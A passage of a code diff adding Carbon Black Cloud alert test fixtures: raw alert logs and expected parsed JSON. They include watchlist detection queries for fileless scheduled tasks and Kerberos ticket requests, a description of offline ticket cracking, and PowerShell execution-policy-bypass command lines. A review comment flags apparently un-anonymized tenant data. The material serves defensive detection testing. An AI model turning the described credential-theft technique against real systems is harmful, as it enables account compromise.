scope\",\"reason_code\":\"2e5170e7-2665-49d2-829e-f5bdeefe6b06:f8b1637a-dc0c-49bb-bc28-5b48f97e6d58\",\"threat_id\":\"0811c72d38d40951b4b90dba05638a20669c9f001ea2e65eeb4768f813d6ed0c\",\"primary_event_id\":\"X0z55sxeTGWPfKuzPkFlCg-61\",\"policy_applied\":\"NOT_APPLIED\",\"run_state\":\"RAN\",\"sensor_action\":\"ALLOW\",\"workflow\":{\"change_timestamp\":\"2023-04-13T11:55:52.550Z\",\"changed_by_type\":\"USER\",\"changed_by\":\"sample@demoorg.com\",\"closure_reason\":\"NO_REASON\",\"status\":\"IN_PROGRESS\"},\"determination\":{\"change_timestamp\":\"2023-02-22T21:07:57.955Z\",\"value\":\"NONE\",\"changed_by_type\":\"USER\",\"changed_by\":\"sample@demoorg.com\"},\"tags\":[\"demotag\"],\"alert_notes_present\":false,\"threat_notes_present\":true,\"is_updated\":false,\"mdr_alert\":false,\"mdr_alert_notes_present\":false,\"mdr_threat_notes_present\":false,\"netconn_remote_port\":443,\"netconn_local_port\":56618,\"netconn_protocol\":\"TCP\",\"netconn_remote_domain\":\"demo.remote.domain.com\",\"netconn_remote_ip\":\"175.16.199.0\",\"netconn_local_ip\":\"1.128.0.0\
",\"netconn_remote_ipv4\":\"175.16.199.0\",\"netconn_local_ipv4\":\"1.128.0.0\",\"k8s_cluster\":\"demo:demo-cluster\",\"k8s_namespace\":\"kube-system\",\"k8s_kind\":\"DaemonSet\",\"k8s_workload_name\":\"ama-logs\",\"k8s_pod_name\":\"ama-logs-gm5tt\",\"k8s_policy_id\":\"2e5170e7-2665-49d2-829e-f5bdeefe6b06\",\"k8s_policy\":\"Big runtime policy\",\"k8s_rule_id\":\"f8b1637a-dc0c-49bb-bc28-5b48f97e6d58\",\"k8s_rule\":\"Allowed public destinations\",\"connection_type\":\"EGRESS\",\"egress_group_id\":\"\",\"egress_group_name\":\"\",\"ip_reputation\":96,\"remote_is_private\":false}", + "reason": "Detected a connection to a public destination that isn't allowed for this scope", + "severity": 5, + "start": "2023-02-06T00:09:19.320Z" + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2023-02-06T00:10:51.176Z", + "carbon_black_cloud": { + "alert": { + "alert_notes_present": false, + "category": "THREAT", + "connection_type": "EGRESS", + "device": { + "location": "UNKNOWN", + "os": "WINDOWS", + "target_value": "MEDIUM" + }, + "ip_reputation": 96, + "is_updated": false, + "k8s_cluster": "tomer:sensor-aks", + "k8s_kind": "DaemonSet", + "k8s_namespace": "kube-system", + "k8s_pod_name": "ama-logs-gm5tt", + "k8s_policy": "Big runtime policy", + "k8s_policy_id": "ef4ccd0b-df14-4f5d-8454-480c5193a0b7", + "k8s_rule": "Allowed public destinations", + "k8s_rule_id": "11111111-1111-1111-1111-111111111111", + "k8s_workload_name": "ama-logs", + "mdr": { + "alert": false, + "alert_notes_present": false + }, + "netconn": { + "local_ip": "10.244.2.22", + "local_ipv4": "10.244.2.22", + "local_port": 56618, + "protocol": "TCP", + "remote_domain": "westeurope.monitoring.azure.com", + "remote_ip": "67.43.156.0", + "remote_ipv4": "67.43.156.0", + "remote_port": 443 + }, + "organization_key": "ABCD1234", + "policy_applied": "NOT_APPLIED", + "primary_event_id": "X0z55sxeTGWPfKuzPkFlCg-61", + "process": { + "effective_reputation": "RESOLVING", + "guid": 
"ABCD1234-00000000-00200e62-00000000-1d92c1262642b33", + "hash": { + "md5": "4cbdc5f51d0397b26886191b799131d5", + "sha256": "506ffc437f5d3c4803a45b895b02557e7280eb3c6eb7d8ff8bd9073990e989d5" + }, + "name": "KUBERNETES_RUNTIME_NODE_AGENT", + "pid": 2100834, + "reputation": "NOT_LISTED" + }, + "reason_code": "2e5170e7-2665-49d2-829e-f5bdeefe6b06:f8b1637a-dc0c-49bb-bc28-5b48f97e6d58", + "remote_is_private": false, + "run_state": "RAN", + "sensor_action": "ALLOW", + "threat_id": "0811c72d38d40951b4b90dba05638a20669c9f001ea2e65eeb4768f813d6ed0c", + "type": "CONTAINER_RUNTIME", + "url": "https://defense-dev01.cbdtest.io/alerts?orgKey=ABCD1234&s%5Bc%5D%5Bquery_string%5D=id%3Af0c7970b-f23c-919e-0cd8-7a38bd373a6f", + "version": "2.0.0", + "workflow": { + "change_timestamp": "2023-02-06T00:13:37.663Z", + "changed_by": "ALERT_CREATION", + "changed_by_type": "SYSTEM", + "closure_reason": "NO_REASON", + "status": "OPEN" + } + } + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "end": "2023-02-06T00:09:19.320Z", + "id": "f0c7970b-f23c-919e-0cd8-7a38bd373a6f", + "kind": "alert", + "original": "{\"version\":\"2.0.0\",\"org_key\":\"ABCD1234\",\"alert_url\":\"https://defense-dev01.cbdtest.io/alerts?orgKey=ABCD1234&s%5Bc%5D%5Bquery_string%5D=id%3Af0c7970b-f23c-919e-0cd8-7a38bd373a6f\",\"id\":\"f0c7970b-f23c-919e-0cd8-7a38bd373a6f\",\"type\":\"CONTAINER_RUNTIME\",\"is_updated\":false,\"detection_timestamp\":\"2023-02-06T00:10:51.176Z\",\"first_event_timestamp\":\"2023-02-06T00:09:19.320Z\",\"last_event_timestamp\":\"2023-02-06T00:09:19.320Z\",\"severity\":5,\"reason\":\"Detected a connection to a public destination that isn't allowed for this 
scope\",\"threat_id\":\"0811c72d38d40951b4b90dba05638a20669c9f001ea2e65eeb4768f813d6ed0c\",\"primary_event_id\":\"X0z55sxeTGWPfKuzPkFlCg-61\",\"workflow\":{\"status\":\"OPEN\",\"change_timestamp\":\"2023-02-06T00:13:37.663Z\",\"changed_by_type\":\"SYSTEM\",\"changed_by\":\"ALERT_CREATION\",\"closure_reason\":\"NO_REASON\"},\"alert_notes_present\":false,\"policy_applied\":\"NOT_APPLIED\",\"run_state\":\"RAN\",\"reason_code\":\"2e5170e7-2665-49d2-829e-f5bdeefe6b06:f8b1637a-dc0c-49bb-bc28-5b48f97e6d58\",\"sensor_action\":\"ALLOW\",\"device_target_value\":\"MEDIUM\",\"device_os\":\"WINDOWS\",\"device_location\":\"UNKNOWN\",\"k8s_policy_id\":\"ef4ccd0b-df14-4f5d-8454-480c5193a0b7\",\"k8s_policy\":\"Big runtime policy\",\"k8s_rule_id\":\"11111111-1111-1111-1111-111111111111\",\"k8s_rule\":\"Allowed public destinations\",\"k8s_cluster\":\"tomer:sensor-aks\",\"k8s_namespace\":\"kube-system\",\"k8s_kind\":\"DaemonSet\",\"k8s_workload_name\":\"ama-logs\",\"k8s_pod_name\":\"ama-logs-gm5tt\",\"connection_type\":\"EGRESS\",\"ip_reputation\":96,\"netconn_remote_port\":443,\"netconn_local_port\":56618,\"netconn_protocol\":\"TCP\",\"netconn_remote_domain\":\"westeurope.monitoring.azure.com\",\"netconn_remote_ip\":\"67.43.156.0\",\"netconn_local_ip\":\"10.244.2.22\",\"netconn_remote_ipv4\":\"67.43.156.0\",\"netconn_local_ipv4\":\"10.244.2.22\",\"remote_is_private\":false,\"process_guid\":\"ABCD1234-00000000-00200e62-00000000-1d92c1262642b33\",\"process_pid\":2100834,\"process_name\":\"KUBERNETES_RUNTIME_NODE_AGENT\",\"process_sha256\":\"506ffc437f5d3c4803a45b895b02557e7280eb3c6eb7d8ff8bd9073990e989d5\",\"process_md5\":\"4cbdc5f51d0397b26886191b799131d5\",\"process_reputation\":\"NOT_LISTED\",\"process_effective_reputation\":\"RESOLVING\",\"mdr_alert_notes_present\":false,\"mdr_alert\":false}", + "reason": "Detected a connection to a public destination that isn't allowed for this scope", + "severity": 5, + "start": "2023-02-06T00:09:19.320Z" + }, + "host": { + "os": { + "type": 
"windows" + } + }, + "process": { + "entity_id": "ABCD1234-00000000-00200e62-00000000-1d92c1262642b33", + "executable": "KUBERNETES_RUNTIME_NODE_AGENT", + "hash": { + "md5": "4cbdc5f51d0397b26886191b799131d5", + "sha256": "506ffc437f5d3c4803a45b895b02557e7280eb3c6eb7d8ff8bd9073990e989d5" + }, + "name": "KUBERNETES_RUNTIME_NODE_AGENT", + "pid": 2100834 + }, + "related": { + "hash": [ + "506ffc437f5d3c4803a45b895b02557e7280eb3c6eb7d8ff8bd9073990e989d5", + "4cbdc5f51d0397b26886191b799131d5" + ] + }, + "tags": [ + "preserve_original_event" + ] + } + ] +} \ No newline at end of file diff --git a/packages/carbon_black_cloud/data_stream/alert_v7/_dev/test/pipeline/test-alert-watchlist.log b/packages/carbon_black_cloud/data_stream/alert_v7/_dev/test/pipeline/test-alert-watchlist.log new file mode 100644 index 00000000000..c72a8d54e5a --- /dev/null +++ b/packages/carbon_black_cloud/data_stream/alert_v7/_dev/test/pipeline/test-alert-watchlist.log 
@@ -0,0 +1,2 @@ +{"org_key":"7DESJ9GN","alert_url":"defense.conferdeploy.net/alerts?s[c][query_string]=id:1c6aba68-24cc-41e3-ad8e-4b545a587b55&orgKey=7DESJ9GN","id":"1c6aba68-24cc-41e3-ad8e-4b545a587b55","type":"WATCHLIST","backend_timestamp":"2024-03-13T08:03:29.540Z","user_update_timestamp":null,"backend_update_timestamp":"2024-03-13T08:03:29.540Z","detection_timestamp":"2024-03-13T08:02:36.578Z","first_event_timestamp":"2024-03-13T08:00:09.894Z","last_event_timestamp":"2024-03-13T08:00:09.894Z","severity":5,"reason":"Process powershell.exe was detected by the report \"Execution - AMSI - New Fileless Scheduled Task Behavior Detected\" in watchlist \"AMSI Threat Intelligence\"","reason_code":"c21ca826-573a-3d97-8c1e-93c8471aab7f:8033b29d-81d2-3c47-82d2-f4a7f398b85d","threat_id":"C21CA826573A8D974C1E93C8471AAB7F","primary_event_id":"re9M9hp8TbGLqyk6QXqQqA-0","policy_applied":"NOT_APPLIED","run_state":"RAN","sensor_action":"ALLOW","workflow":{"change_timestamp":"2024-03-13T08:03:29.540Z","changed_by_type":"SYSTEM","changed_by":"ALERT_CREATION","closure_reason":"NO_REASON","status":"OPEN"},"determination":{"change_timestamp":"2024-03-13T08:03:29.540Z","value":"NONE","changed_by_type":"SYSTEM","changed_by":"ALERT_CREATION"},"tags":null,"alert_notes_present":false,"threat_notes_present":false,"is_updated":false,"device_id":6612391,"device_name":"EIP\\WW-20002","device_uem_id":"","device_target_value":"MEDIUM","device_policy":"default","device_policy_id":6525,"device_os":"WINDOWS","device_os_version":"Windows 10 x64","device_username":"EIP\\Administrator","device_location":"UNKNOWN","device_external_ip":"75.98.230.194","device_internal_ip":"172.16.100.140","asset_group":[],"mdr_alert":false,"mdr_alert_notes_present":false,"mdr_threat_notes_present":false,"report_id":"LrKOC7DtQbm4g8w0UFruQg-d1080521-e617-4e45-94e0-7a145c62c90a","report_name":"Execution - AMSI - New Fileless Scheduled Task Behavior Detected","report_description":"Newer Powershell versions introduced 
built-in cmdlets to manage scheduled tasks natively without calling out to typical scheduled task processes like at.exe or schtasks.exe. This detection looks for behaviors related to the fileless execution of scheduled tasks. If you are responding to this alert, be sure to correlate the fileless scriptload events with events typically found in your environment Generally, attackers will create scheduled tasks with binaries that are located in user writable directories like AppData, Temp, or public folders.","report_tags":["execution","privesc","persistence","t1053","windows","amsi","attack","attackframework"],"report_link":"https://attack.mitre.org/techniques/T1053/","ioc_id":"d1080521-e617-4e45-94e0-7a145c62c90a","ioc_hit":"(fileless_scriptload_cmdline:Register-ScheduledTask OR fileless_scriptload_cmdline:New-ScheduledTask OR scriptload_content:Register-ScheduledTask OR scriptload_content:New-ScheduledTask) AND NOT (process_cmdline:windows\\\\ccm\\\\systemtemp OR crossproc_name:windows\\\\ccm\\\\ccmexec.exe OR (process_publisher:\"VMware, Inc.\" AND process_publisher_state:FILE_SIGNATURE_STATE_TRUSTED))","watchlists":[{"id":"Ci7w5B4URg6HN60hatQMQ","name":"AMSI Threat Intelligence"}],"process_guid":"7DESJ9GN-0064e5a7-00001434-00000000-1da751c7354ebfe","process_pid":5172,"process_name":"c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe","process_sha256":"9785001b0dcf755eddb8af294a373c0b87b2498660f724e76c4d53f9c217c7a3","process_md5":"2e5a8590cf6848968fc23de3fa1e25f1","process_effective_reputation":"TRUSTED_WHITE_LIST","process_reputation":"TRUSTED_WHITE_LIST","process_cmdline":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -EP Bypass \\\\eip.demo\\sysvol\\EIP.DEMO\\scripts\\Luminol.ps1","process_username":"NT AUTHORITY\\SYSTEM","process_issuer":["Microsoft Windows Production PCA 2011"],"process_publisher":["Microsoft 
Windows"],"parent_guid":"7DESJ9GN-0064e5a7-0000077c-00000000-1da5ed7ec07b275","parent_pid":1916,"parent_name":"c:\\windows\\system32\\svchost.exe","parent_sha256":"f13de58416730d210dab465b242e9c949fb0a0245eef45b07c381f0c6c8a43c3","parent_md5":"145dcf6706eeea5b066885ee17964c09","parent_effective_reputation":"TRUSTED_WHITE_LIST","parent_reputation":"TRUSTED_WHITE_LIST","parent_cmdline":"C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule","parent_username":"NT AUTHORITY\\SYSTEM","childproc_guid":"","childproc_username":"","childproc_cmdline":"","ml_classification_final_verdict":"NOT_ANOMALOUS","ml_classification_global_prevalence":"LOW","ml_classification_org_prevalence":"LOW","ml_classification_anomalies":[]} +{"org_key":"ABCD1234","alert_url":"defense.conferdeploy.net/alerts?s[c][query_string]=id:3d80bd8b-7770-40a7-8d6b-8268fb15c59f&orgKey=ABCD1234","id":"3d80bd8b-7770-40a7-8d6b-8268fb15c59f","type":"WATCHLIST","backend_timestamp":"2023-07-17T17:21:34.063Z","user_update_timestamp":null,"backend_update_timestamp":"2023-07-17T17:21:34.063Z","detection_timestamp":"2023-07-17T17:21:13.483Z","first_event_timestamp":"2023-07-17T17:19:00.412Z","last_event_timestamp":"2023-07-17T17:19:00.412Z","severity":10,"reason":"Process powershell.exe was detected by the report \"Credential Access - AMSI - Suspect Kerberos Ticket Request Behavior\" in watchlist \"AMSI Threat 
Intelligence\"","reason_code":"cf4e6de7-4aa8-3188-8034-6a54fdea940c:e17d957d-b504-3462-816c-f182fe1d80ab","threat_id":"CF4E6DE74AA8B188C0346A54FDEA940C","primary_event_id":"VUX7Bu7vTrWwnU8-uSVh1A-0","policy_applied":"NOT_APPLIED","run_state":"RAN","sensor_action":"ALLOW","workflow":{"change_timestamp":"2023-07-17T17:21:34.063Z","changed_by_type":"SYSTEM","changed_by":"ALERT_CREATION","closure_reason":"NO_REASON","status":"OPEN"},"determination":{"change_timestamp":"2023-07-17T17:21:34.063Z","value":"NONE","changed_by_type":null,"changed_by":null},"tags":null,"alert_notes_present":false,"threat_notes_present":false,"is_updated":false,"device_id":5890528,"device_name":"demodevice","device_uem_id":"596B6C4DD49AEF4AB3713363DDBB1F11","device_target_value":"MEDIUM","device_policy":"default","device_policy_id":6525,"device_os":"WINDOWS","device_os_version":"Windows 11 x64","device_username":"Test-Win11","device_location":"UNKNOWN","device_external_ip":"1.2.3.4","device_internal_ip":"4.3.2.1","mdr_alert":false,"mdr_alert_notes_present":false,"mdr_threat_notes_present":false,"report_id":"LrKOC7DtQbm4g8w0UFruQg-b1c1ae83-f66b-4aa3-a496-363e296f4018","report_name":"Credential Access - AMSI - Suspect Kerberos Ticket Request Behavior","report_description":"Service accounts in Windows Active Directory environments have the ability to register under an AD security principle (user or computer) as a (SPN) Service Principal Name. The SPN registration allows for kerberos clients to request a kerberos service ticket associated with the service account SPN. This kerberos TGS is encrypted using the service accounts password. If a weak password is assigned to this service account an attacker can make an out of band request for one of these kerberos service tickets and crack it offline with tools like Jack the Ripper. This detection looks for fileless behaviors related to the out of band kerberos ticket request. 
If you are responding to this alert you should take immediate action and look at the process that alerted on this behavior as well as the other fileless script loads events.","report_tags":["credentialaccess","t1558","windows","amsi","attack","attackframework"],"report_link":"https://attack.mitre.org/techniques/T1558/003/","ioc_id":"b1c1ae83-f66b-4aa3-a496-363e296f4018","ioc_hit":"fileless_scriptload_cmdline:\"System.IdentityModel.Tokens.KerberosRequestorSecurityToken\" OR scriptload_content:\"System.IdentityModel.Tokens.KerberosRequestorSecurityToken\"","watchlists":[{"id":"Ci7w5B4URg6HN60hatQMQ","name":"AMSI Threat Intelligence"}],"process_guid":"ABCD1234-0059e1e0-00003544-00000000-1d9b8db27a4d423","process_pid":13636,"process_name":"c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe","process_sha256":"d436e66c0d092508e4b85290815ab375695fa9013c7423a3a27fed4f1acf90bd","process_md5":"0499440c4b0783266183246e384c6657","process_effective_reputation":"TRUSTED_WHITE_LIST","process_reputation":"TRUSTED_WHITE_LIST","process_cmdline":"powershell.exe -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -","process_username":"NT AUTHORITY\\SYSTEM","process_issuer":["Microsoft Windows Production PCA 2011"],"process_publisher":["Microsoft Windows"],"parent_guid":"ABCD1234-0059e1e0-00002890-00000000-1d9a898aa24acc9","parent_pid":10384,"parent_name":"c:\\program files\\demo\\sample\\myscript.exe","parent_sha256":"4ab2c4932e01ab8460bd8bff5afb0c76e9e238c10ce47515be40c49f652d0282","parent_md5":"c7e583681f0958d4f5d32afd09d8084b","parent_effective_reputation":"NOT_LISTED","parent_reputation":"NOT_LISTED","parent_cmdline":"\"C:\\Program Files\\demo\\sample\\myscript.exe\" ","parent_username":"NT AUTHORITY\\SYSTEM","childproc_guid":"","childproc_username":"","childproc_cmdline":"","ml_classification_final_verdict":"ANOMALOUS","ml_classification_global_prevalence":"MEDIUM","ml_classification_org_prevalence":"LOW"} 
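Review bot: The first sample in test-alert-watchlist.log does not look anonymized: it carries `org_key` `7DESJ9GN` (every other fixture uses `ABCD1234`), `device_external_ip` `75.98.230.194`, a routable address outside the placeholder ranges the other fixtures use, and site-specific identifiers such as `device_name` `EIP\\WW-20002` and the UNC path `\\\\eip.demo\\sysvol\\EIP.DEMO\\scripts\\Luminol.ps1`, all of which land in a public repository. The second sample on the same line shows the intended pattern (`ABCD1234`, `demodevice`, `1.2.3.4` / `4.3.2.1`). Replacing the tenant values with placeholders already used on this page, e.g. `"org_key":"ABCD1234"` and `"device_external_ip":"1.2.3.4"`, and rewriting the `process_guid`/`parent_guid` prefixes that embed the same org key, would bring it in line. test-alert-watchlist.log-expected.json mirrors these values and would need regenerating after the change.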
diff --git a/packages/carbon_black_cloud/data_stream/alert_v7/_dev/test/pipeline/test-alert-watchlist.log-expected.json b/packages/carbon_black_cloud/data_stream/alert_v7/_dev/test/pipeline/test-alert-watchlist.log-expected.json new file mode 100644 index 00000000000..94a65f7d5d3 --- /dev/null +++ b/packages/carbon_black_cloud/data_stream/alert_v7/_dev/test/pipeline/test-alert-watchlist.log-expected.json 
@@ -0,0 +1,349 @@ +{ + "expected": [ + { + "@timestamp": "2024-03-13T08:02:36.578Z", + "carbon_black_cloud": { + "alert": { + "alert_notes_present": false, + "backend_timestamp": "2024-03-13T08:03:29.540Z", + "backend_update_timestamp": "2024-03-13T08:03:29.540Z", + "category": "THREAT", + "determination": { + "change_timestamp": "2024-03-13T08:03:29.540Z", + "changed_by": "ALERT_CREATION", + "changed_by_type": "SYSTEM", + "value": "NONE" + }, + "device": { + "external_ip": "75.98.230.194", + "internal_ip": "172.16.100.140", + "location": "UNKNOWN", + "os": "WINDOWS", + "policy": "default", + "policy_id": 6525, + "target_value": "MEDIUM" + }, + "ioc": { + "hit": "(fileless_scriptload_cmdline:Register-ScheduledTask OR fileless_scriptload_cmdline:New-ScheduledTask OR scriptload_content:Register-ScheduledTask OR scriptload_content:New-ScheduledTask) AND NOT (process_cmdline:windows\\\\ccm\\\\systemtemp OR crossproc_name:windows\\\\ccm\\\\ccmexec.exe OR (process_publisher:\"VMware, Inc.\" AND process_publisher_state:FILE_SIGNATURE_STATE_TRUSTED))", + "id": "d1080521-e617-4e45-94e0-7a145c62c90a" + }, + "is_updated": false, + "mdr": { + "alert": false, + "alert_notes_present": false, + "threat_notes_present": false + }, + "ml_classification_final_verdict": "NOT_ANOMALOUS", + "ml_classification_global_prevalence": "LOW", + "ml_classification_org_prevalence": "LOW", + "organization_key": "7DESJ9GN", + "parent": { + "cmdline": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule", + "effective_reputation": "TRUSTED_WHITE_LIST", + "guid": "7DESJ9GN-0064e5a7-0000077c-00000000-1da5ed7ec07b275", + "hash": { + "md5": "145dcf6706eeea5b066885ee17964c09", + "sha256": "f13de58416730d210dab465b242e9c949fb0a0245eef45b07c381f0c6c8a43c3" + }, + "name": "c:\\windows\\system32\\svchost.exe", + "pid": 1916, + "reputation": "TRUSTED_WHITE_LIST", + "username": "NT AUTHORITY\\SYSTEM" + }, + "policy_applied": "NOT_APPLIED", + "primary_event_id": "re9M9hp8TbGLqyk6QXqQqA-0", + 
"process": { + "cmdline": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -EP Bypass \\\\eip.demo\\sysvol\\EIP.DEMO\\scripts\\Luminol.ps1", + "effective_reputation": "TRUSTED_WHITE_LIST", + "guid": "7DESJ9GN-0064e5a7-00001434-00000000-1da751c7354ebfe", + "hash": { + "md5": "2e5a8590cf6848968fc23de3fa1e25f1", + "sha256": "9785001b0dcf755eddb8af294a373c0b87b2498660f724e76c4d53f9c217c7a3" + }, + "issuer": [ + "Microsoft Windows Production PCA 2011" + ], + "name": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", + "pid": 5172, + "publisher": [ + "Microsoft Windows" + ], + "reputation": "TRUSTED_WHITE_LIST", + "username": "NT AUTHORITY\\SYSTEM" + }, + "reason_code": "c21ca826-573a-3d97-8c1e-93c8471aab7f:8033b29d-81d2-3c47-82d2-f4a7f398b85d", + "report": { + "description": "Newer Powershell versions introduced built-in cmdlets to manage scheduled tasks natively without calling out to typical scheduled task processes like at.exe or schtasks.exe. This detection looks for behaviors related to the fileless execution of scheduled tasks. 
If you are responding to this alert, be sure to correlate the fileless scriptload events with events typically found in your environment Generally, attackers will create scheduled tasks with binaries that are located in user writable directories like AppData, Temp, or public folders.", + "id": "LrKOC7DtQbm4g8w0UFruQg-d1080521-e617-4e45-94e0-7a145c62c90a", + "link": "https://attack.mitre.org/techniques/T1053/", + "name": "Execution - AMSI - New Fileless Scheduled Task Behavior Detected", + "tags": [ + "execution", + "privesc", + "persistence", + "t1053", + "windows", + "amsi", + "attack", + "attackframework" + ] + }, + "run_state": "RAN", + "sensor_action": "ALLOW", + "threat_id": "C21CA826573A8D974C1E93C8471AAB7F", + "threat_notes_present": false, + "type": "WATCHLIST", + "url": "defense.conferdeploy.net/alerts?s[c][query_string]=id:1c6aba68-24cc-41e3-ad8e-4b545a587b55&orgKey=7DESJ9GN", + "watchlists": [ + { + "id": "Ci7w5B4URg6HN60hatQMQ", + "name": "AMSI Threat Intelligence" + } + ], + "workflow": { + "change_timestamp": "2024-03-13T08:03:29.540Z", + "changed_by": "ALERT_CREATION", + "changed_by_type": "SYSTEM", + "closure_reason": "NO_REASON", + "status": "OPEN" + } + } + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "end": "2024-03-13T08:00:09.894Z", + "id": "1c6aba68-24cc-41e3-ad8e-4b545a587b55", + "kind": "alert", + "original": "{\"org_key\":\"7DESJ9GN\",\"alert_url\":\"defense.conferdeploy.net/alerts?s[c][query_string]=id:1c6aba68-24cc-41e3-ad8e-4b545a587b55&orgKey=7DESJ9GN\",\"id\":\"1c6aba68-24cc-41e3-ad8e-4b545a587b55\",\"type\":\"WATCHLIST\",\"backend_timestamp\":\"2024-03-13T08:03:29.540Z\",\"user_update_timestamp\":null,\"backend_update_timestamp\":\"2024-03-13T08:03:29.540Z\",\"detection_timestamp\":\"2024-03-13T08:02:36.578Z\",\"first_event_timestamp\":\"2024-03-13T08:00:09.894Z\",\"last_event_timestamp\":\"2024-03-13T08:00:09.894Z\",\"severity\":5,\"reason\":\"Process powershell.exe was detected by the report \\\"Execution - AMSI - New 
Fileless Scheduled Task Behavior Detected\\\" in watchlist \\\"AMSI Threat Intelligence\\\"\",\"reason_code\":\"c21ca826-573a-3d97-8c1e-93c8471aab7f:8033b29d-81d2-3c47-82d2-f4a7f398b85d\",\"threat_id\":\"C21CA826573A8D974C1E93C8471AAB7F\",\"primary_event_id\":\"re9M9hp8TbGLqyk6QXqQqA-0\",\"policy_applied\":\"NOT_APPLIED\",\"run_state\":\"RAN\",\"sensor_action\":\"ALLOW\",\"workflow\":{\"change_timestamp\":\"2024-03-13T08:03:29.540Z\",\"changed_by_type\":\"SYSTEM\",\"changed_by\":\"ALERT_CREATION\",\"closure_reason\":\"NO_REASON\",\"status\":\"OPEN\"},\"determination\":{\"change_timestamp\":\"2024-03-13T08:03:29.540Z\",\"value\":\"NONE\",\"changed_by_type\":\"SYSTEM\",\"changed_by\":\"ALERT_CREATION\"},\"tags\":null,\"alert_notes_present\":false,\"threat_notes_present\":false,\"is_updated\":false,\"device_id\":6612391,\"device_name\":\"EIP\\\\WW-20002\",\"device_uem_id\":\"\",\"device_target_value\":\"MEDIUM\",\"device_policy\":\"default\",\"device_policy_id\":6525,\"device_os\":\"WINDOWS\",\"device_os_version\":\"Windows 10 x64\",\"device_username\":\"EIP\\\\Administrator\",\"device_location\":\"UNKNOWN\",\"device_external_ip\":\"75.98.230.194\",\"device_internal_ip\":\"172.16.100.140\",\"asset_group\":[],\"mdr_alert\":false,\"mdr_alert_notes_present\":false,\"mdr_threat_notes_present\":false,\"report_id\":\"LrKOC7DtQbm4g8w0UFruQg-d1080521-e617-4e45-94e0-7a145c62c90a\",\"report_name\":\"Execution - AMSI - New Fileless Scheduled Task Behavior Detected\",\"report_description\":\"Newer Powershell versions introduced built-in cmdlets to manage scheduled tasks natively without calling out to typical scheduled task processes like at.exe or schtasks.exe. This detection looks for behaviors related to the fileless execution of scheduled tasks. 
If you are responding to this alert, be sure to correlate the fileless scriptload events with events typically found in your environment Generally, attackers will create scheduled tasks with binaries that are located in user writable directories like AppData, Temp, or public folders.\",\"report_tags\":[\"execution\",\"privesc\",\"persistence\",\"t1053\",\"windows\",\"amsi\",\"attack\",\"attackframework\"],\"report_link\":\"https://attack.mitre.org/techniques/T1053/\",\"ioc_id\":\"d1080521-e617-4e45-94e0-7a145c62c90a\",\"ioc_hit\":\"(fileless_scriptload_cmdline:Register-ScheduledTask OR fileless_scriptload_cmdline:New-ScheduledTask OR scriptload_content:Register-ScheduledTask OR scriptload_content:New-ScheduledTask) AND NOT (process_cmdline:windows\\\\\\\\ccm\\\\\\\\systemtemp OR crossproc_name:windows\\\\\\\\ccm\\\\\\\\ccmexec.exe OR (process_publisher:\\\"VMware, Inc.\\\" AND process_publisher_state:FILE_SIGNATURE_STATE_TRUSTED))\",\"watchlists\":[{\"id\":\"Ci7w5B4URg6HN60hatQMQ\",\"name\":\"AMSI Threat Intelligence\"}],\"process_guid\":\"7DESJ9GN-0064e5a7-00001434-00000000-1da751c7354ebfe\",\"process_pid\":5172,\"process_name\":\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"process_sha256\":\"9785001b0dcf755eddb8af294a373c0b87b2498660f724e76c4d53f9c217c7a3\",\"process_md5\":\"2e5a8590cf6848968fc23de3fa1e25f1\",\"process_effective_reputation\":\"TRUSTED_WHITE_LIST\",\"process_reputation\":\"TRUSTED_WHITE_LIST\",\"process_cmdline\":\"\\\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\" -EP Bypass \\\\\\\\eip.demo\\\\sysvol\\\\EIP.DEMO\\\\scripts\\\\Luminol.ps1\",\"process_username\":\"NT AUTHORITY\\\\SYSTEM\",\"process_issuer\":[\"Microsoft Windows Production PCA 2011\"],\"process_publisher\":[\"Microsoft 
Windows\"],\"parent_guid\":\"7DESJ9GN-0064e5a7-0000077c-00000000-1da5ed7ec07b275\",\"parent_pid\":1916,\"parent_name\":\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"parent_sha256\":\"f13de58416730d210dab465b242e9c949fb0a0245eef45b07c381f0c6c8a43c3\",\"parent_md5\":\"145dcf6706eeea5b066885ee17964c09\",\"parent_effective_reputation\":\"TRUSTED_WHITE_LIST\",\"parent_reputation\":\"TRUSTED_WHITE_LIST\",\"parent_cmdline\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Schedule\",\"parent_username\":\"NT AUTHORITY\\\\SYSTEM\",\"childproc_guid\":\"\",\"childproc_username\":\"\",\"childproc_cmdline\":\"\",\"ml_classification_final_verdict\":\"NOT_ANOMALOUS\",\"ml_classification_global_prevalence\":\"LOW\",\"ml_classification_org_prevalence\":\"LOW\",\"ml_classification_anomalies\":[]}", + "reason": "Process powershell.exe was detected by the report \"Execution - AMSI - New Fileless Scheduled Task Behavior Detected\" in watchlist \"AMSI Threat Intelligence\"", + "severity": 5, + "start": "2024-03-13T08:00:09.894Z" + }, + "host": { + "hostname": "WW-20002", + "id": "6612391", + "name": "WW-20002", + "os": { + "type": "windows", + "version": "Windows 10 x64" + } + }, + "process": { + "command_line": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -EP Bypass \\\\eip.demo\\sysvol\\EIP.DEMO\\scripts\\Luminol.ps1", + "entity_id": "7DESJ9GN-0064e5a7-00001434-00000000-1da751c7354ebfe", + "executable": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", + "hash": { + "md5": "2e5a8590cf6848968fc23de3fa1e25f1", + "sha256": "9785001b0dcf755eddb8af294a373c0b87b2498660f724e76c4d53f9c217c7a3" + }, + "name": "powershell.exe", + "parent": { + "command_line": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule", + "entity_id": 